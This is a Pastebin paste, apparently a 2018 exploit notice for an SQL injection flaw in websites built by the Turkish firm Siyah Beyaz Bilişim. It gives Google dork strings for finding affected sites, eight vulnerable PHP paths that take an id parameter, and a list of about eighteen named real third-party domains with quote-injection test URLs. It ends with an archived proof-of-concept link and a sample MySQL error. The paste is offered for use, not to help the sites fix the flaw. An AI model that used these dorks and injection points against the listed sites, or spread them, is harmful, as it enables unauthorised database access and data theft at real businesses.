API tools faq
paste
KingSkrupellos

Siyah Beyaz Bilişim SQL Injection Vulnerability

KingSkrupellos
Nov 22nd, 2018
177
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : Siyah Beyaz Bilişim SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 23/11/2018
  6. # Vendor Homepage : siyahbeyazbilisim.com
  7. # Tested On : Windows and Linux
  8. # Category : WebApps
  9. # Google Dorks :
  10. intext:''Tasarım ve Kodlama Siyah Beyaz Bilişim tarafından yapılmıştır.''
  11. intext:''Tasarım ve Kodlama SiyahBeyazBilişim tarafından yapılmıştır.''
  12. # Exploit Risk : Medium
  13. # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. #################################################################################################
  16.  
  17. # SQL Injection Exploit :
  18.  
  19. /yazi.php?id=[SQL Injection]
  20.  
  21. /resimler.php?id=[SQL Injection]
  22.  
  23. /sayfa.php?id=[SQL Injection]
  24.  
  25. /grup.php?id=[SQL Injection]
  26.  
  27. /haber.php?id=[SQL Injection]
  28.  
  29. /slider.php?id=[SQL Injection]
  30.  
  31. /sube.php?id=[SQL Injection]
  32.  
  33. /duyurular.php?id=[SQL Injection]
  34.  
  35. #################################################################################################
  36.  
  37. # Example Vulnerable Sites =>
  38.  
  39. [+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] => archive.is/cABYo
  40.  
  41. [+] sevennakliyat.com/resimler.php?id=3%27
  42.  
  43. [+] tucanteknik.com/sayfa.php?id=110%27
  44.  
  45. [+] turenyapi.com/grup.php?id=16%27
  46.  
  47. [+] saranlar.com/sube.php?id=2%27
  48.  
  49. [+] semirauto.com/grup.php?id=1%27
  50.  
  51. [+] aydinkompresor.net/kurumsal.php?id=4%27
  52.  
  53. [+] simgepastacilik.com/grup.php?id=12%27
  54.  
  55. [+] kocarlitarispamuk.com/grup.php?id=4%27
  56.  
  57. [+] royalmarine.com.tr/grup.php?id=2%27
  58.  
  59. [+] didimsanatakademisi.com/album.php?id=12%27
  60.  
  61. [+] dundarlarparke.com/grup.php?id=6%27
  62.  
  63. [+] aykimsan.com.tr/grup.php?id=22%27
  64.  
  65. [+] lilacambalkon.com/resimler.php?id=7%27
  66.  
  67. [+] avrupakulturakademi.com/sayfa.php?id=1%27
  68.  
  69. [+] novasluxe.com/sayfa.php?id=21%27
  70.  
  71. [+] megafit.com.tr/resimler.php?id=3%27
  72.  
  73. [+] dogrugunespaneli.com/grup.php?id=6%27
  74.  
  75. #################################################################################################
  76.  
  77. # Example SQL Database Error :
  78.  
  79. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5
  80.  
  81. #################################################################################################
  82.  
  83. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  84.  
  85. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!